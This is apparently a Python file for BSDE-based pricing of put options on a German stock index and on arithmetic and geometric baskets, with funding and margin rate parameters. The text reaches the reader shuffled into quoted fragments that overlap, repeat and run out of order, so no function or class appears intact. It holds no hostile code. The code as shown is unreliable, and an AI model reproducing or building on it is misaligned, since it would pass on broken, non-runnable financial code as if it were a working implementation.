0.648, 0.623, 0.570, 0.530]) cholesky_decomposition =", "expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ +", "self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield +", "= \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 + 5 + 1", "Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic", "0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232,", "+ 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples,", "0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\"", "riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\", "derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] =", "delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions", "option for BS model\" self.dimension = dimension # Market parameters and functions self.riskless_rate", "= 5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01,", "= -1. put_call = \"Put\" # Regression functions and parameters sorting_method = \"Intrinsic", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t,", ":]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta)", "* delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) *", "* delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product", "\"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic", "theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 +", "regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :],", "# Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield =", "<NAME> This file holds the parameters for all specific example and the numerical", "* theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta =", "-0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name", "regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion,", "riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta", "= self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta,", "i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar", "functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\"", "riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1])", "function file \"\"\" import numpy as np class GermenIndexPut(): # Example Information name", "= False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic", "regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :],", "kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t *", "delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar", "regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield", ":]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i,", "(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta,", "Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1", "0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) #", "rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] *", "ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t", "expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate", "* (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar +", "adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust = False", "= 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate =", "name = \"Put option for a 5 stocks German index model\" dimension =", "# Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time", "self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "= 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self,", "delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i +", "= \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "file holds the parameters for all specific example and the numerical scheme for", "dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield", "* np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1.,", "np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "* np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40. *", "27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1. put_call", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t *", "self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) #", "range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in", "i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2", "theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i',", "rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:,", "= np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071,", "- self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1 - theta[0]) *", "initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5", "\"\"\" Created on Mon May 14 17:21:26 2018 @author: <NAME> This file holds", "# Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield", "0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\", "\\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :],", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t,", "0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40.", "delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate * delta_t) *", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):", "np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield +", "regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :],", "German index model\" dimension = 5 # Stock parameters stock_model = \"BS\" initial_value", ":], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield -", "__init__(self, dimension): # Example Information self.name = \"Arithmetic basket put option for BS", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0]", "5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0]", "- (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t", "->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j,", "delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta,", "* (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0,", "def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ -", "kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) *", "self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield +", "in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree", "np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield -", "= np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension,", "= \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:],", "self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\", "(1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j,", "ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)", "\"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\", "jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)", "expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk->", "+ self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield", "strike = 1. terminal_time = 1. buy_sell = -1. put_call = \"Put\" #", "functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0.", "# Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions", "example and the numerical scheme for the BSDE. .. todo:: Moving the numerical", "development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate =", "numerical scheme for the BSDE. .. todo:: Moving the numerical scheme to the", "expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t,", "= \"Put option for a 5 stocks German index model\" dimension = 5", "delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk ->", ":], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield +", "self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta,", "0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]])", "= 3 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self,", "= \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1", "adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:,", "stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07", "self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price", "delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\", "range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference", "= adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust =", "i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for", "delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric Intrinsic", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t,", "- self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield", "+ (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t *", "for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1)", "expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :],", "= 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock", "np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call =", "1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative,", "expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate ,", "expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate ,", "numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate,", "for all specific example and the numerical scheme for the BSDE. .. todo::", "class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket put", "functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield =", "expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate", "\"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 +", "delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis,", "np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i,", "adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:,", "Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets", "0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277,", "0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279,", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff,", "and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3", "ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient,", "0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 *", "to the function file \"\"\" import numpy as np class GermenIndexPut(): # Example", "0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06", "0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float)", ":], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate ,", "* rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0]", "self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1]", "1. buy_sell = -1. put_call = \"Put\" # Regression functions and parameters sorting_method", "Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield =", "expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])", "\"Put\" # Regression functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic", "np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition =", "Moving the numerical scheme to the function file \"\"\" import numpy as np", "dimension = 5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01,", "all specific example and the numerical scheme for the BSDE. .. todo:: Moving", "1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp", "\\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1])", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta,", "parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression", "= 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression", "+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return", "rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i]", "and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate =", "# Example Information name = \"Put option for a 5 stocks German index", "and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield", "0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate =", "+ rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate,", "self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0,", "dimension): # Example Information self.name = \"Arithmetic basket put option for BS model\"", "on Mon May 14 17:21:26 2018 @author: <NAME> This file holds the parameters", "self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate", "0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta,", "dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix =", "dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\", "delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta =", "self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 +", "* np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) *", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\", "riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis,", "theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) *", "= \"Arithmetic basket put option for BS model\" self.dimension = dimension # Market", "- self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) +", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ +", "- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) *", "*\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\", "= 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value =", "return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t,", "-> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp /", "= 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self,", "self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) #", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield", "= adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust =", "\"Arithmetic basket put option for BS model\" self.dimension = dimension # Market parameters", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate * delta_t *", "rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj", "no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative,", "adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double)", "-> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1", "= 1. self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric", "self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 *", "riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 -", "* np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar,", "delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :],", "= np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar", "np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ -", "for a 5 stocks German index model\" dimension = 5 # Stock parameters", "as np class GermenIndexPut(): # Example Information name = \"Put option for a", "a 5 stocks German index model\" dimension = 5 # Stock parameters stock_model", "rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion]", "# Reference Solution reference_riskfree = False refererce_adjust = False # Under development class", "= 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis,", "delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate)", "- theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - 